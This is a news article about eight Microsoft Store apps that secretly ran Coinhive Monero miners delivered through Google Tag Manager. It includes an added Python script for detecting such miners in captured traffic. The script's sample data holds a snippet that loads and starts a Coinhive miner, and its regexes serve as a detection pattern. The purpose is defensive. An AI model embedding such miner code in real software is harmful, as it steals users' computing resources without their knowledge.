Cryptojacking Coinhive Miners Land on the Microsoft Store For the First Time


A batch of eight potentially unwanted applications (PUAs) was found on the Microsoft Store dropping malicious Monero (XMR) Coinhive cryptomining scripts, delivered with the help of Google’s legitimate Google Tag Manager (GTM) library.

This is especially interesting given that GTM is a tag management system designed by Google to let developers inject JavaScript and HTML content into their apps for tracking and analytics purposes.

After Symantec, which discovered the eight apps in Redmond’s store, reported them, Microsoft removed Fast-search Lite, Battery Optimizer (Tutorials), VPN Browsers+, Downloader for YouTube Videos, Clean Master+ (Tutorials), FastTube, Findoo Browser 2019, and Findoo Mobile & Desktop Search, apps published by three developers (DigiDream, 1clean, and Findoo).

Cryptojacking apps in the Microsoft Store

As Symantec’s Yuanjing Guo and Tommy Dong stated, the risky apps were found “on Windows 10, including Windows 10 S Mode” and were added to the Microsoft Store between April and December 2018, most of them landing in the store at the end of that year.

While there is no way to know the exact number of installs for each app, since Microsoft does not show install counts on Microsoft Store entries the way Google’s Play Store does, it is clear that they were either installed on numerous devices or received a large number of fake ratings, given that “there were almost 1,900 ratings posted.”

The Symantec researchers explain that:

As soon as the apps are downloaded and launched, they fetch a coin-mining JavaScript library by triggering Google Tag Manager (GTM) in their domain servers. The mining script then gets activated and begins using the majority of the computer’s CPU cycles to mine Monero for the operators. Although these apps appear to provide privacy policies, there is no mention of coin mining on their descriptions on the app store.

After inspecting the network traffic between the apps and their command-and-control servers, Symantec found that they were using a variant of the JavaScript-based Coinhive miner, a well-known tool used by threat actors in cryptojacking campaigns since its launch in September 2017.
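The two paragraphs above describe the delivery chain (app launches, GTM container fires, a tag pulls in the miner) and how Symantec identified it from traffic. The following script is an added example, written for this page and not code from Symantec or the apps’ developers, of the check a responder would run over a proxy or PCAP export of that traffic: it flags GTM container loads and Coinhive indicators (the library’s public loader filename, constructor names, throttle setting and pool host) and pulls out the 32-character site key the operators are paid under. The indicator list is illustrative rather than exhaustive, the GTM container ID, the `example.invalid` host and the site key in the sample responses are constructed, and the response tuples stand in for whatever your capture tool exports.

```python
"""Flag Coinhive-style miner delivery in captured HTTP responses.

Added example: input is an iterable of (url, body) pairs exported from a
proxy or PCAP; the sample data below is constructed for the demonstration.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Indicators taken from the public Coinhive JavaScript library: the loader
# filename (coinhive.min.js, or authedmine.min.js for the opt-in build), the
# CoinHive.* constructors, the throttle setting, and the coin-hive.com
# WebSocket pool. Illustrative, not exhaustive.
MINER_PATTERNS = {
    "coinhive loader script": re.compile(r"(?:coinhive|authedmine)\.min\.js", re.I),
    "coinhive constructor": re.compile(r"new\s+CoinHive\.(?:Anonymous|User|Token)\s*\(", re.I),
    "coinhive websocket pool": re.compile(r"wss?://[^\s\"']*coin-?hive\.com", re.I),
    "miner throttle setting": re.compile(r"(?:setThrottle\s*\(|throttle\s*:)\s*0?\.\d+", re.I),
}
# Coinhive site keys are 32 alphanumeric characters passed as the first
# constructor argument; this is what ties the mining to the operator's account.
SITE_KEY = re.compile(r"new\s+CoinHive\.\w+\s*\(\s*['\"]([A-Za-z0-9]{32})['\"]")
# GTM container load; on its own this is benign and only recorded for context.
GTM_CONTAINER = re.compile(r"googletagmanager\.com/gtm\.js\?id=(GTM-[A-Z0-9]+)", re.I)


@dataclass
class Finding:
    url: str
    reason: str
    detail: str = ""


def analyze(responses: Iterable[Tuple[str, str]]) -> List[Finding]:
    """Return one Finding per indicator matched in each (url, body) pair."""
    findings: List[Finding] = []
    for url, body in responses:
        container = GTM_CONTAINER.search(url)
        if container:
            findings.append(Finding(url, "gtm container loaded", container.group(1)))
        for reason, pattern in MINER_PATTERNS.items():
            if pattern.search(body) or pattern.search(url):
                findings.append(Finding(url, reason))
        key = SITE_KEY.search(body)
        if key:
            findings.append(Finding(url, "coinhive site key", key.group(1)))
    return findings


def miner_site_keys(findings: Iterable[Finding]) -> List[str]:
    """Site keys are the pivot for hunting other apps run by the same operator."""
    return sorted({f.detail for f in findings if f.reason == "coinhive site key"})


# Constructed sample traffic: a GTM container load, a tag served from the
# operator's own host that pulls the miner and starts it at 20% throttle,
# and an unrelated analytics script that must not be flagged.
SAMPLE_RESPONSES = [
    ("https://www.googletagmanager.com/gtm.js?id=GTM-ABC1234",
     "(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime()});})();"),
    ("https://cdn.example.invalid/tag.js",
     "<script src=\"https://cdn.example.invalid/lib/coinhive.min.js\"></script>\n"
     "<script>var m = new CoinHive.Anonymous('0123456789abcdef0123456789abcdef', "
     "{throttle: 0.2}); m.start();</script>"),
    ("https://www.google-analytics.com/analytics.js",
     "(function(){ ga('send', 'pageview'); })();"),
]

if __name__ == "__main__":
    results = analyze(SAMPLE_RESPONSES)
    for f in results:
        print(f"{f.reason:28s} {f.url} {f.detail}")
    print("site keys:", miner_site_keys(results))
```

Run against the constructed sample, the GTM container is recorded once, the operator-hosted tag produces four findings (loader, constructor, throttle, site key), and the analytics script produces none. Matching on the GTM container alone is not evidence of anything; the signal is a miner indicator appearing in a response that a GTM tag pulled in.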

Because cryptomining scripts usually run on compromised machines without any resource usage controls, the Windows systems where these apps landed very likely experienced serious performance problems from the miner continuously consuming all available CPU to mine Monero for its operators.

While cryptocurrency miners are not malicious tools on their own, they are seen as malware when used by threat actors to secretly mine for crypto coins in the background stealing processing resources from unaware victims’ devices.

As part of cryptojacking malware campaigns, criminals collect all the cryptocurrency surreptitiously mined on compromised systems and send it to crypto wallets they control.

Cryptojacking on the rise

According to a report by Check Point Research, cryptominers infected roughly ten times more companies during 2018 than ransomware did, overtaking the previous apex predator of the malware scene.

However, only one in five security professionals were able to detect that their company’s systems had been affected by a malware attack while the cryptocurrency mining scripts were silently running in the background.

The trend is even more noticeable when taking into consideration that the apps Microsoft just removed from the Microsoft Store are the first of their kind targeting this platform.

Linux users are also actively targeted by cryptojacking campaigns: a new backdoor Trojan that Check Point researchers dubbed SpeakUp is currently targeting servers running six different Linux distributions as well as Apple’s macOS, and a new coinminer strain using the XMR-Stak Cryptonight miner was detected this month.

Palo Alto Networks’ researchers previously stated during the summer of 2018 that criminal groups have mined an approximate total of 798,613.33 Monero coins (XMR) using malware on infected devices, earning them over $108 million in US currency, which represents around 5% of all the Monero currently in circulation.

Researchers from the Universidad Carlos III de Madrid and King’s College London reached a similar conclusion at the start of 2019, confirming Palo Alto Networks’ results and concluding that criminals have mined at least 4.3% of all Monero coins.